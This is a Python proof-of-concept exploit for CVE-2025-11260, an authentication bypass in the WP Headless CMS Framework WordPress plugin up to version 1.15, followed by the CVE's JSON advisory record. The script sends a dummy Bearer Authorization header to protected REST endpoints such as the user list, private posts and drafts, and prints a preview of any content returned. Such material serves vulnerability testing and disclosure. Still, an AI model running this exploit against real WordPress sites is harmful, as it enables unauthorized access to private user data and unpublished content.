CVE-2025-11260

import requests # CVE-2025-11260 PoC - WP Headless CMS Framework Authentication Bypass # Target: WordPress site with WP Headless CMS Framework plugin <= 1.15 target_url = "http://target-wordpress-site.com" # Endpoints that should require authentication protected_endpoints = [ "/wp-json/wp/v2/users", "/wp-json/wp/v2/posts?status=private", "/wp-json/wp-headless-cms/v1/protected-content", "/wp-json/wp/v2/pages?status=draft" ] print("[*] CVE-2025-11260 Authentication Bypass PoC") print("[*] Target:", target_url) print("[*] Testing protected endpoints with Authorization header bypass...\n") # Normal request without Authorization header (should be blocked) print("[1] Testing without Authorization header:") response_normal = requests.get(target_url + protected_endpoints[0]) print(f" Status: {response_normal.status_code}") if response_normal.status_code == 401 or response_normal.status_code == 403: print(" Result: Properly blocked - Authentication required\n") else: print(" Result: Endpoint accessible without auth\n") # Request WITH Authorization header (bypassing nonce check) print("[2] Testing WITH Authorization header (bypass attempt):") headers = { "Authorization": "Bearer any_value_here", "User-Agent": "Mozilla/5.0" } response_bypass = requests.get(target_url + protected_endpoints[0], headers=headers) print(f" Status: {response_bypass.status_code}") if response_bypass.status_code == 200: print(" Result: VULNERABLE! Authentication bypassed") print(" Response preview:", response_bypass.text[:500]) print("\n[!] The plugin incorrectly validates only the existence of Authorization header") print("[!] Any value in Authorization header bypasses nonce protection") else: print(" Result: Not vulnerable or endpoint not found")

{"cve": {"id": "CVE-2025-11260", "sourceIdentifier": "[email protected]", "published": "2025-11-13T09:15:46.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Headless CMS Framework plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.15. This is due to the plugin only checking for the existence of the Authorization header in a request when determining if the nonce protection should be bypassed. This makes it possible for unauthenticated attackers to access content they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://wordpress.org/plugins/wp-rest-headless/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d6a99806-cb8f-4c12-86ed-2cdbb45ba873?source=cve", "source": "[email protected]"}]}}